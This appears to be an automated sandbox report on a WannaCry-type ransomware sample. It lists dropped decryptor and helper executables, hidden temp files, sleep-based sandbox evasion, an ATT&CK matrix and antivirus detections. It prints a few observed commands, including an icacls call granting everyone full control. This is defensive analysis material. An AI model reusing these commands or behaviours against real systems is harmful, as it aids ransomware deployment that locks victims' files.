Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\Documents\@WanaDecryptor@.exe	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\@WanaDecryptor@.exe	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\@WanaDecryptor@.exe	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\Desktop\taskdl.exe	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\Desktop\u.wnry	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\Desktop\taskse.exe	Jump to dropped file

Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe

File created: C:\Users\user\Desktop\u.wnry

Jump to dropped file

Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\~SDA7C1.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\~SDA7C2.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Java\~SDA7C3.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\~SD77B.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\~SD77C.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\~SD7CE7.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\~SD7CE8.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\7-Zip\~SD7CE9.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessibility\~SD7CEA.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessories\~SD7CEB.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Administrative Tools\~SD7CFC.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\AutoIt v3\~SD7CFD.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\AutoIt v3\Extras\~SD7CFE.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Java\~SD7D0E.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Maintenance\~SD7D0F.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\StartUp\~SD7D10.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\System Tools\~SD7D11.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Windows PowerShell\~SD7D12.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\~SD3BC9.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\~SD3BCA.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\7-Zip\~SD3BCB.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Accessibility\~SD3BCC.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Accessories\~SD3BCD.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Administrative Tools\~SD3BCE.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\AutoIt v3\~SD3BCF.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\~SD3BD0.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Java\~SD3BD1.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Maintenance\~SD3BE2.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\StartUp\~SD3BE3.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\System Tools\~SD3BE4.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\~SD3BF5.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\~SD860E.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\~SD860F.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\7-Zip\~SD8610.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessibility\~SD8611.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessories\~SD8612.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessories\System Tools\~SD8613.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Administrative Tools\~SD8614.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\AutoIt v3\~SDFAE7.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\AutoIt v3\Extras\~SDFAE8.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\AutoIt v3\Extras\AutoItX\~SDFAE9.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Java\~SDFAEA.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Maintenance\~SDFAEB.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Microsoft Office Tools\~SDFAEC.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\StartUp\~SDFAFD.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\System Tools\~SD6FC0.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Windows PowerShell\~SD6FC1.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\~SD665.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\~SD676.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\7-Zip\~SD677.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Accessibility\~SD678.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Accessories\~SD679.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\~SD689.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Administrative Tools\~SD69A.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\AutoIt v3\~SD69B.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\~SD7B6E.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX\~SD7B6F.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Java\~SD7B70.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Maintenance\~SD7B81.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Microsoft Office Tools\~SD7B82.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\StartUp\~SD7B93.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\System Tools\~SD7BA3.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\~SD7BA4.tmp	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Creates files in the recycle bin to hide itself

Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe

File created: C:\$Recycle.Bin\~SDE94A.tmp

Jump to behavior

Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe

Process created: C:\Windows\SysWOW64\icacls.exe icacls . /grant Everyone:F /T /C /Q

Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cscript.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Window / User API: threadDelayed 1238
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Window / User API: threadDelayed 7152

Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Dropped PE file which has not been started: C:\Users\user\Downloads\@WanaDecryptor@.exe	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\@WanaDecryptor@.exe	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Dropped PE file which has not been started: C:\Users\user\Documents\@WanaDecryptor@.exe	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\@WanaDecryptor@.exe	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Dropped PE file which has not been started: C:\@WanaDecryptor@.exe	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\u.wnry	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\taskse.exe	Jump to dropped file

Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe TID: 7680	Thread sleep time: -35000s >= -30000s
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe TID: 7684	Thread sleep count: 1238 > 30
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe TID: 7684	Thread sleep time: -3714000s >= -30000s
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe TID: 7708	Thread sleep time: -870000s >= -30000s
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe TID: 7688	Thread sleep time: -210000s >= -30000s
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe TID: 7684	Thread sleep count: 7152 > 30
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe TID: 7684	Thread sleep time: -21456000s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\taskdl.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\taskdl.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\taskdl.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\taskdl.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\taskdl.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\taskdl.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\taskdl.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\taskdl.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\taskdl.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\taskdl.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\taskdl.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\taskdl.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\taskdl.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\taskdl.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\taskdl.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\taskdl.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\taskdl.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\taskdl.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\taskdl.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\taskdl.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\taskdl.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\taskdl.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\taskdl.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\taskdl.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\taskdl.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\taskdl.exe

6_2_00401080

Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Thread delayed: delay time: 30000
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Thread delayed: delay time: 30000

Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\~SD1D8B.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\ClipSVC\Archive\Apps\~SD746.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\ClipSVC\GenuineTicket\~SD747.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\ClipSVC\~SD1DAF.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Caches\~SD1DAE.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\ClipSVC\Archive\~SD1DC0.tmp	Jump to behavior

Source: cscript.exe, 0000000A.00000003.1358094599.0000000002A48000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe //nologo m.vbs

Source: C:\Windows\SysWOW64\cscript.exe

Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	12 Scripting	Valid Accounts	12 Command and Scripting Interpreter	12 Scripting	11 Process Injection	11 Masquerading	OS Credential Dumping	1 Security Software Discovery	Remote Services	Data from Local System	Data Obfuscation	Exfiltration Over Other Network Medium	1 Data Encrypted for Impact
Credentials	Domains	Default Accounts	1 Native API	1 Registry Run Keys / Startup Folder	1 Registry Run Keys / Startup Folder	11 Virtualization/Sandbox Evasion	LSASS Memory	11 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	Junk Data	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 Services File Permissions Weakness	1 Services File Permissions Weakness	11 Process Injection	Security Account Manager	1 Application Window Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Steganography	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 DLL Side-Loading	1 DLL Side-Loading	1 Hidden Files and Directories	NTDS	3 File and Directory Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Services File Permissions Weakness	LSA Secrets	12 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 File Deletion	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
LisectAVT_2403002A_126.EXE.exe	100%	Avira	TR/Ransom.JB
LisectAVT_2403002A_126.EXE.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\@WanaDecryptor@.exe	100%	Avira	TR/FileCoder.724645
C:\@WanaDecryptor@.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://schemas.micr	0%	URL Reputation	safe
https://www.google.com/search?q=how	0%	Avira URL Cloud	safe
http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how	0%	Avira URL Cloud	safe
http://www.btcfrog.com/qr/bitcoinPNG.php?address=%s	0%	Avira URL Cloud	safe

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.btcfrog.com/qr/bitcoinPNG.php?address=%s	LisectAVT_2403002A_126.EXE.exe, 00000000.00000003.1788283067.0000000000AFE000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002A_126.EXE.exe, 00000000.00000003.1374099272.0000000000ABF000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://schemas.micr	m_danish.wnry.0.dr	false	URL Reputation: safe	unknown
https://www.google.com/search?q=how	LisectAVT_2403002A_126.EXE.exe, 00000000.00000003.1788283067.0000000000AFE000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002A_126.EXE.exe, 00000000.00000003.1374099272.0000000000ABF000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
